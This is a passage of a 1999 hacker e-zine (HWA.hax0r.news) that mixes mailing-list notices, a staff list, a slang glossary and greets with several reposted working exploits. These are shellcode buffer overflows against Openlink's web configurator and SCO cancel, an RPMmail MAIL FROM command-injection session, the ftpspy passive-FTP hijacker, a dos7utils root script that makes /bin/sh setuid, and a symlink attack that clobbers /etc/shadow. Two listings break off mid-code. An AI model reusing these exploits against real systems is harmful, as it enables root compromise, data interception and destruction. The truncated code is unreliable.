 * subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead
accounts very difficult. I am currently receiving as many as fifty returned
mails a day. Any of the above are grounds for being unsubscribed. You are
welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles,
Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak
Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics,
member subscription, and everything else about the list is solely at his
discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and
server costs.

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net ..............
: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already, also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind if you ever find out I may have to get those hax0rs from 'Hackers'
or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds'
this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to
all you up and comers, I'd highly recommend you get that book. It's almost like
buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be
reprinted unless changed in a big way with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below: Some are very useful, others attempt to deny any possible attempts at
eschewing obfuscation by obscuring their actual definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal"
          ASC(247) "wavey equals" sign means "almost equal" to. If written as
          =/= (equals sign with a slash thru it) also means !=, =< is Equal to
          or less than and => is equal to or greater than (etc, this aint
          fucking grade school, cripes, don't believe I just typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL     - A great deal of people that got ripped off for net access by a huge
          clueless isp with sekurity that you can drive buses through, we're
          not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at
          the least they could try leasing one??
*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go to
          swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get
          drunk, watch videos and seminars, get drunk, listen to speakers, and
          last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
          speak he's the guy that breaks into systems and is often (but by no
          means always) a "script kiddie" see pheer
          2 . An edible biscuit usually crappy tasting without a nice dip, I
          like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger,
          Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
          ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC     - End of Commentary
EoA     - End of Article or more commonly @HWA
EoF     - End of file
EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty and
          doubt", usually in general media articles not high brow articles
          such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing people to
          type weird crap on irc, hence when someone says something stupid or
          off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
          difficult to define, I think it is best defined as pop culture's view
          on The Hacker ala movies such as well erhm "Hackers" and The Net
          etc... usually used by "real" hackers or crackers in a derogatory or
          slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r
          some bread on the way to the table please?'
          2 - A tool for cutting sheet metal.
HHN     - Maybe a bit confusing with HNN but we did spring to life around the
          same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as
          a proper noun means the hackernews site proper. k? k. ;&

HNN     - Hacker News Network and its affiliates
          http://www.hackernews.com/affiliates.html

J00     - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC     - Depends on context: No Further Comment or No Fucking Comment

NFR     - Network Flight Recorder (Do a websearch) see 0wn3d

NFW     - No fuckin'way

*0WN3D  - You are cracked and owned by an elite entity see pheer

*OFCS   - Oh for christ's sakes

PHACV   - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding
          (CC) Groups Virus, Warfare

          Alternates: H  - hacking, hacktivist
                      C  - Cracking
                      C  - Cracking
                      V  - Virus
                      W  - Warfare
                      A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P  - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

*PHEER  - This is what you do when an ereet or elite person is in your presence
          see 0wn3d

*RTFM   - Read the fucking manual - not always applicable since some manuals
          are pure shit but if the answer you seek is indeed in the manual then
          you should have RTFM you dumb ass.

TBC     - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA     - To Be Arranged/To Be Announced also 2ba

TFS     - Tough fucking shit.

*w00t   - 1 - Reserved for the uber ereet, noone can say this without severe
          repercussions from the underground masses. also "w00ten"
          2 - Cruciphux and sAs72's second favourite word (they're both shit
          stirrers)

*wtf    - what the fuck, where the fuck, when the fuck etc ..

*ZEN    - The state you reach when you *think* you know everything (but really
          don't) usually shortly after reaching the ZEN like state something
          will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh.
     - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to
see more reader input, help me out here, what's good, what sucks etc, not that
I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix
Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer

Folks from #hwa.hax0r,news

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..."
                                                            - FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from
whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid
questions... well there are but if you ask something really dumb we'll just
laugh at ya, let's give the message board a bit more use eh? I'll be using a
real message board when the hwa-iwa.org domain comes back online (soon)
meanwhile the beseen board is still up...
==============================================================================

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");

    /*
     * It would appear that the admins at milmail after one year of good use
     * have decided to blackball my hwa@press.usmc.net address, fuckers. So
     * please send all mail to cruciphux@dok.org.... thanks and sorry for
     * the problem.
     *
     * Cruciphux
     */

    printf("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main
address:

hwa@press.usmc.net

complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes,
synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 Exploit for Openlink's web configurator for Linux/glibc2
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za/

/*
 * Exploit for Openlink's web configurator for Linux/glibc2
 * use: pipe through netcat to openlink web port (8000 default)
 * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
 * makes www_sv execute /usr/bin/wall if you hit the address right
 *
 * For informational purposes only. This was written to show that
 * there's a problem, not for skr1pt k1dd33z --.
 * don't ask me for help on how to use this to crack systems,
 * help compiling or anything else. It will only compile on
 * an x86 compiler however.
 *
 * Addresses that work for me: 0xbffffb65 (initial run of the broker)
 *                             0xbffffb85 (all consecutive attempts)
 *                             probably tied to process ID www_sv runs as;
 *                             first try PIDs were in triple digits, others
 *                             4 digit PIDs.
 *
 * If this works, generally no more www_sv processes will be run as
 * a side effect.
 *
 * -Tymm
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void test()
{
    __asm__("
        jmp doit
exploit:
        # code basically from Aleph One's smash stacking article, with
        # minor mods
        popl %esi
        movb $0xd0, %al         # Get a / character into %al
        xorb $0xff, %al
        movb %al, 0x1(%esi)     # drop /s into place
        movb %al, 0x5(%esi)
        movb %al, 0x9(%esi)
        xorl %eax,%eax          # clear %eax
        movb %eax,0xe(%esi)     # drop a 0 at end of string
        movl %eax,0x13(%esi)    # drop NULL for environment
        leal 0x13(%esi),%edx    # point %edx to environment
        movl %esi,0xf(%esi)     # drop pointer to argv
        leal 0xf(%esi),%ecx     # point %ecx to argv
        movl %esi,%ebx          # point ebx to command - 1
        inc %ebx                # fix it to point to the right place
        movb $0xb,%al           # index to execve syscall
        int $0x80               # execute it
        xorl %ebx,%ebx          # if exec failed, exit nicely...
        movl %ebx,%eax
        inc %eax
        int $0x80
doit:
        call exploit
        .string \"..usr.bin.wall.\"
    ");
}

char *shellcode = ((char *)test) + 3;
char code[1000];

int main(int argc, char *argv[])
{
    int i;
    int left;
    unsigned char where[] = {"\0\0\0\0\0"};
    int *here;
    char *dummy;
    long addr;

    if (argc > 1)
        addr = strtoul(argv[1], &dummy, 0);
    else
        addr = 0xbffffb85;

    fprintf(stderr, "Setting address to %8x\n", addr);
    *((long *)where) = addr;

    strcpy(code, shellcode);
    for (i = 0; i < 64; i++) {
        strcat(code, where);
    }
    printf("GET %s\n", code);
    exit(0);
}

@HWA

04.0 sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za/

/**
 *** sco_cancel.c yields egid=18(lp)
 *** Tested on SCO 5.0.5+Skunkware98
 ***
 *** Compile gcc -o sco_cancelx.c sco_cancelx.c
 ***
 *** Brock Tellier btellier@usa.net
 ***
 **/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char scoshell[]= /* doble@iname.com */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define LEN 1500
#define NOP 0x90

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc,
         char *argv[])
{
    long int offset=0;
    int i;
    int buflen = LEN;
    long int addr;
    char buf[LEN];

    if(argc > 3) {
        fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
        exit(0);
    } else if (argc == 2){
        offset=atoi(argv[1]);
    } else if (argc == 3) {
        offset=atoi(argv[1]);
        buflen=atoi(argv[2]);
    } else {
        offset=600;
        buflen=1200;
    }

    addr=get_sp();

    fprintf(stderr, "\nSCO 5.0.5 cancel exploit yields egid=18(lp)\n");
    fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
    fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

    memset(buf,NOP,buflen);
    memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
    for(i=((buflen/2) + strlen(scoshell))+1;i

[... source truncated here in the original; the rest of sco_cancel.c, the
05.0 section header and the start of the first RPMmail session are missing,
and the text resumes mid-way through an SMTP exchange ...]

... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

Sendmail 8.9.3 + RPMmail

[nhaniff@dhcp-160-190 nhaniff]$ telnet (host) 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;@microsoft.com
250 <;/command/to/execute;@microsoft.com> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

@HWA

06.0 ftpspy, ftp exploit
     ~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za/

/* ftpspy.c

   This program is written to show the vulnerability of some FTP servers when
   establishing passive ftp connections. You MAY use this program or any part
   of it to test your ftp server for this vulnerability. You MUST NOT use this
   program or any part of it against another FTP server. The program is
   distributed "AS IS" without any guarantees.

   This program uses the fact that most TCP/IP stacks allocate TCP ports for
   applications one-by-one.
   Program creates FTP connection to FTPPORT of attacked machine, logs in as
   USER with PASS and then every RETRYDELAY seconds sends PASV command to
   server to find which TCP port is used now by server. After port is
   discovered program bombs next NTHREAD ports starting from found port +
   OFFSET with "connect" requests.

   Vuln: FreeBSD 2.2.1-2.2.5

   (c) 1999 3APA3A aka Wise Tomcat
   Please send all your comments to wise@tomcat.ru

             /\_/\
            { . . }    |\
   +--oQQo->{  ^  }<-----+ \
   |  3APA3A  U  3APA3A  }  +-------------o66o--+ /
   |/
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define DEBUGLEVEL 1
#define USER "USER ftp\012"
#define PASS "PASS root@\012"
#define PASV "PASV\012"
#define NTHREADS 3
#define RETRYDELAY 10
#define FTPPORT 21
#define OFFSET 1
#define TIMEOUT 5

int gotit=0;
char buf[4100];
long size;
int port;
char * text = "All my loving I will send to you\r\012All my loving, darling I'll be true\r\012 rw-r--r-- 1 1012 5 406 Aug 08 10:08 loving\r\012";

void usage( char* progname)
{
    fprintf(stderr, "Usage: %s ipaddr", progname);
    exit(1);
}

void getsignal(int sig)
{
    if(!gotit){
#if DEBUGLEVEL > 2
        fprintf(stderr, "Port %d killed\n", port);
#endif
        exit(0); /* Papa asks me to shutdown! */
    }
}

jmp_buf env;
int needalarm=0;

void br(int sig)
{
    if(needalarm) longjmp(env,1);
}

/* Read FTP SERVER replies while they begin '###-'. Last line looks like '### '.
*/
void getftpdata(int sock)
{
    char * newl;
    while( (size = read(sock, buf, 1024)) > 0 ){
#if DEBUGLEVEL > 1
        write(2, "<<", 2);
        write(2, buf, size);
#endif
        if( size > 0 ) buf[size] = 0;
        for( newl=buf; newl && ((newl-buf) < (size-3)); newl = strchr(newl, '\012') )
            if(newl[3] != '-' && isdigit(newl[1]) ) return;
    }
}

/* write command to FTP SERVER */
void writeftpdata(int sock, char* data)
{
    write(sock, data, strlen(data));
#if DEBUGLEVEL > 1
    write(2, ">>", 2);
    write(2, data, strlen(data));
#endif
}

int main(int argc, char* argv[])
{
    struct sockaddr_in sin;
    int ftpsock, sock;
    char addr[16];
    int i;
    int code, a1, a2, a3, a4, p1, p2;
    pid_t children[NTHREADS];
    pid_t child;

    if(argc!=2) usage(argv[0]);

    sin.sin_addr.s_addr = inet_addr(argv[1]);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(FTPPORT);

    if ((ftpsock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
        fprintf(stderr, "Error: Unable to allocate socket\n");
        return -1;
    }
    /* connect to FTPPORT of FTP SERVER */
    if( connect(ftpsock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){
        fprintf(stderr, "Unable to connect %s:%d\n", argv[1], FTPPORT);
        return -2;
    }
    /* now log in as USER with PASS */
    getftpdata(ftpsock);
    writeftpdata(ftpsock, USER);
    getftpdata(ftpsock);
    writeftpdata(ftpsock, PASS);
    getftpdata(ftpsock);
#if DEBUGLEVEL > 0
    fprintf(stderr, "Logged on\n");
#endif
    for(;;){
        /* every RETRYDELAY seconds we send PASV command to FTP SERVER in
           order to have fresh information about ports it listens on */
        writeftpdata(ftpsock, PASV);
        getftpdata(ftpsock);
        sscanf(buf, "%d Entering Passive Mode (%d,%d,%d,%d,%d,%d)",
               &code, &a1, &a2, &a3, &a4, &p1, &p2);
        if( code < 200 || code > 300 ){
            fprintf(stderr, "Unable to enter PASV mode: %d\n", code);
            return -3;
        }
        sprintf(addr, "%d.%d.%d.%d", a1, a2, a3, a4);
        port = p1 * 256 + p2; /* FTP SERVER allocated this port for us */
#if DEBUGLEVEL > 2
        fprintf(stderr, "Got port %d\n", port);
#endif
        sin.sin_addr.s_addr = inet_addr(addr);
#if DEBUGLEVEL > 2
        fprintf(stderr, "Monitor: %s %d-%d\n", addr, port + 1, port
                + NTHREADS + OFFSET - 1); /* We will monitor this port range */
#endif
        /* now let's fork() with NTHREADS - one thread for each port that
           will be bombed */
        for( i=0; (i < NTHREADS) && (child = fork()); i++ )
            children[i] = child;
        if(child){ /* Lucky PAPA */
#if DEBUGLEVEL > 2
            fprintf(stderr, "%i threads started\n", i);
#endif
            /* It's a good time to sleep a little bit and then to kill all
               these noisy children */
            sleep(RETRYDELAY);
            for( i=0; i

[... source truncated here in the original; the end of the parent branch is
missing and the listing resumes inside the child branch ...]

> 2
            fprintf(stderr, "Monitor port %d started\n", port);
#endif
            signal(SIGUSR1, getsignal);
            signal(SIGALRM, br);
            sin.sin_port = htons(port);
            for(;;){ /* Let's bomb the port! */
                if( (sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){
                    printf("Error: Unable to allocate socket\n");
                    return -1;
                }
                if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) != -1 )
                    break;
                close(sock);
            }
            gotit = 1; /* We did it!!! */
            printf("Got it!!!! Port:%d\n", port);
            if(!setjmp(env)){
                needalarm=1;
                alarm(TIMEOUT);
                while( (size = read(sock, buf, 4096)) > 0 ) {
                    needalarm = 0;
                    write (1, buf, size);
                }
            } else {
                writeftpdata(sock, text);
            }
            close(sock);
            return 0;
        }
    }
    return 0;
}

@HWA

07.0 A vulnerability exists in the /usr/lib/merge/dos7utils program...
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za/

#!/bin/sh
#
# A vulnerability exists in the /usr/lib/merge/dos7utils
# program (suid root by default) which allows any user
# to execute any command as root.
#
# The dos7utils program gets its localeset.sh exec path
# from the environment variable STATICMERGE.
# By setting this to a directory writable by us and setting the -f
# switch, we can have dos7utils run our program as follows:
#
# ..Brock Tellier

uname -a; id; pwd
export STATICMERGE=/tmp
cat > /tmp/localeset.sh << 'EOF'
#!/bin/sh
id
chmod +s /bin/sh
EOF
chmod 700 /tmp/localeset.sh
./dos7utils -f bah
/bin/sh

# www.hack.co.za #

@HWA

08.0 SCO OpenServer symlink vulnerability (Brock Tellier)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hack.co.za/

#!/bin/sh
#
# Under certain versions of SCO OpenServer there exists a
# symlink vulnerability which can be exploited to overwrite
# any file which is group writable by the 'auth' group.
#
# The problem in particular is in the
# /etc/sysadm.d/bin/userOsa executable. When given garbage
# output the program will write out a debug log. However,
# the program does not check to see if it is overwriting a
# currently existing file nor whether it is following a
# symlink. Therefore it is possible to overwrite files with
# debug data which are both in the 'auth' group and are
# writable by the same group. Both /etc/shadow & /etc/passwd
# fall into this category. If such an attack were launched
# against these files the system would be rendered unusable.
#
# ..Brock Tellier
#
# vulnerable: SCO Open Server 5.0 -> 5.0.5
#

cd /tmp
ln -s /etc/shadow.old debug.log
/etc/sysadm.d/bin/userOsa

# www.hack.co.za #

@HWA

09.0 GREX cyberspace.org - Free shell access
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free shell (restricted) no telnet/ftp unless you contribute, system is set up
similar to a bbs but you do get a shell. Telnet to cyberspace.org. And you get
this, here's a brief look see at the system;

Grex central timekeeping. At the beep, the time is 6:20PM on Tuesday,
19 October 1999

New to grex? Type help at the login prompt

(ttys3)

grex login: ccc
ccc's Password:

Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com.
Happy Birthday to Jishnu Nair (atticus's baby)!

Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.x.x.x
No mail.

Type 'bbs' to see what Grex is all about!
Type 'change' to change your settings.
Type 'faq' to see answers to frequently asked questions.

> ls -laFF
total 10
drwxr-xr-x   2 ccc   populus   512 Oct 19 18:14 ./
drwxr-xr-x  16 root  wheel     512 Oct 19 18:13 ../
-rw-r--r--   1 ccc   populus  1159 Oct 19 18:15 .agora31.cf
-rw-r--r--   1 ccc   populus   778 Oct 19 18:13 .cfonce
-rw-r--r--   1 ccc   populus   664 Oct 19 18:13 .cshrc
-rw-r--r--   1 ccc   populus   718 Oct 19 18:13 .login
-rw-r--r--   1 ccc   populus  1245 Oct 19 18:13 .mailrc
-rw-------   1 ccc   populus   360 Oct 19 18:13 .plan

> ps -aux
USER       PID %CPU %MEM   SZ  RSS TT STAT START    TIME COMMAND
S 18:01 0:10 telnetd ttyrc 206.10.105 shrike 28123 0.0 0.0 272 0 te IW 16:25 0:02 -tcsh (tcsh) jopap 9888 0.0 0.0 68 0 sa IW 17:58 0:02 -csh (csh) menuadm 11948 0.0 0.0 60 88 u0 S 18:13 0:03 talk prime keesan 12650 0.0 0.0 68 0 qe IW 18:17 0:02 -csh (csh) krj 25547 0.0 0.0 36 0 q1 IW 16:09 0:02 watch ... root 3679 0.0 0.0 144 0 ? IW Oct 14 37:59 /usr/local/libexec/sshd greg99 12558 0.0 0.0 156 0 u8 IW 18:17 0:02 -bash (bash) jackal 12829 0.0 0.0 328 0 rc TW 18:18 0:30 ps -aux party 29735 0.0 0.0 80 104 ue S 16:38 0:07 /usr/local/bin/party_ tadeu 16231 0.0 0.0 796 0 ? IW 12:39 0:01 ftpd: 200.249.132.149: t root 13305 0.0 0.1 252 208 ? S 18:20 0:00 sendmail: startup with l root 8487 0.0 0.0 56 0 ? IW 17:45 0:04 telnetd ttyt4 202.60.130 jackal 12987 0.0 0.0 48 0 rc IW 18:19 0:00 /bin/sh /usr/local/bin/m cfadm 12155 0.0 0.0 96 0 qd IW 18:15 0:01 bbs party 11136 0.0 0.1 72 140 td S 18:07 0:02 /usr/local/bin/party_ rjh123 11441 0.0 0.0 428 124 q8 IW 18:09 0:07 pine root 10897 0.0 0.0 56 56 ? S 18:05 0:08 telnetd ttyt1 209.138.42 root 2642 0.0 0.0 56 56 ? S 17:02 0:17 telnetd ttype 161.233.38 vetri 7729 0.0 0.1 80 160 q3 S 17:39 0:03 -csh (csh) party 10050 0.0 0.0 60 104 pe S 17:59 0:04 /usr/local/bin/party_ mikeaa 12286 0.0 0.1 72 156 t1 S 18:16 0:07 /bin/sh ./configure shooter 4464 0.0 0.0 800 0 ? IW 14:53 0:03 ftpd: 212.49.231.161: sh mooncat 11921 0.0 0.0 68 0 t3 IW 18:13 0:01 -csh (csh) cfadm 11016 0.0 0.0 96 0 td IW 18:06 0:01 /usr/local/bin/bbs pfv 10369 0.0 0.1 52 200 u2 S 18:02 0:07 /a/p/f/pfv/bin/pfilt root 16844 0.0 0.0 496 0 ? IW Oct 17 1:23 /usr/local/libexec/sshd mdw 22714 0.0 0.0 76 0 u5 IW Oct 14 0:06 -csh (csh) bebbe346 8506 0.0 0.0 68 0 t4 IW 17:45 0:01 -csh (csh) pinhead 12766 0.0 0.0 796 0 ? IW 18:18 0:02 ftpd: a03169.sp.mandic.c root 29798 0.0 0.0 40 0 ? 
IW 06:03 0:00 in.ntalkd shrike 2942 0.0 0.0 224 0 te IW 17:05 0:03 elm somesh 11379 0.0 0.0 28 0 s4 IW 18:09 0:00 /bin/sh ./q party 7116 0.0 0.1 60 320 q1 S 17:35 0:07 /usr/local/bin/party_ root 12718 0.0 0.0 56 0 ? IW 12:08 0:35 telnetd ttyq7 edsel.smud root 15158 0.0 0.0 56 0 ? IW 12:30 0:43 telnetd ttyq0 inet.bdsi. root 11000 0.0 0.2 56 436 ? S 18:06 0:05 telnetd ttytd 128.196.22 thea 10435 0.0 0.0 48 0 u1 IW 18:02 0:00 /bin/sh /usr/local/bin/m root 134 0.0 0.0 56 0 ? IW 16:40 0:49 telnetd ttypa 129.115.11 sys 10314 0.0 0.0 36 44 ? I 11:54 0:09 in.identd -w -t300 -l ryan 12424 0.0 0.1 36 152 q5 S 18:16 0:00 /a/r/y/ryan/watch ... root 2470 0.0 0.0 68 0 u5 TW Oct 17 0:02 -sh (csh) sys 26321 0.0 0.0 48 0 ? IW Oct 11 0:00 in.identd -w -t300 -l mikeaa 10916 0.0 0.0 156 0 t1 IW 18:05 0:03 -bash (bash) root 26487 0.0 0.0 56 60 ? S 19:26 1:47 inetd neya 15160 0.0 0.0 72 0 q0 IW 12:30 0:06 -csh (csh) root 120 0.0 0.0 56 56 ? R 16:40 40:18 telnetd ttyr2 147.225.19 krj 25545 0.0 0.0 36 0 q1 IW 16:09 0:03 watch ... root 13219 0.0 0.2 56 432 ? S 18:20 0:01 telnetd ttys3 24.112.155 sj2 8398 0.0 0.0 144 0 t5 IW 17:45 0:01 -bash (bash) keesan 12720 0.0 0.0 48 60 qe S 18:18 0:00 mail wlevak nes16 10616 0.0 0.0 448 0 q2 IW 18:03 0:02 pine root 10058 0.0 0.0 56 0 ? IW 17:59 0:02 telnetd ttyqb 24.30.48.8 nats 12725 0.0 0.0 68 0 q7 IW 12:08 0:05 -csh (csh) abbagirl 2171 0.0 0.0 64 0 u9 IW 16:59 0:02 -csh (csh) party 26762 0.0 0.1 80 208 r3 S 16:16 0:11 /usr/local/bin/party_ party 12225 0.0 0.1 72 180 qd S 18:15 0:01 /usr/local/bin/party_ root 10287 0.0 0.0 56 60 ? S 18:01 0:10 telnetd ttyu2 216.93.16. ryan 12318 0.0 0.0 68 0 q5 IW 18:16 0:01 -csh (csh) root 12644 0.0 0.0 56 60 ? 
> faq

Frequently Asked Questions About Grex

General

* What is Grex?

  Grex is a public-access computer conferencing system in Ann Arbor,
  Michigan, USA. It is cooperatively owned and operated, and is supported
  entirely by donations from users. All staff members are volunteers.

* What does the name "Grex" mean?

  Grex is not an acronym. It is a Latin word meaning "flock". It is the
  root of a number of familiar English words such as aggregate, congregate,
  and gregarious.

* What can I do on this system?

  Grex provides all of the following services for free.
    o Electronic conferencing using "PicoSpan" or "Backtalk"
    o Internet e-mail using "mail", "elm", "pine" or "mh"
    o Browse the web in text mode using "lynx"
    o Access to usenet via "lynx" to the dejanews web site
    o Multichannel real-time chat using "party"
    o Free text-only web site hosting.
    o On-line games, including "Nethack"
    o Access to a Unix shell account, with all standard commands
    o Access to the C/C++ compiler, assembler, and other development tools

  However, Grex does not provide any of the following services at all:

    o Download areas
    o Mailing lists
    o Bots (for IRC or anything else)
    o Graphical web page hosting
    o A place to store files

  And there are a few things you can only do if you are a member (who has
  made a donation and sent ID). These are

    o Vote in Grex elections.
    o Serve on the board of Cyberspace Communications.
    o Access telnet, ftp, and irc sites from Grex.
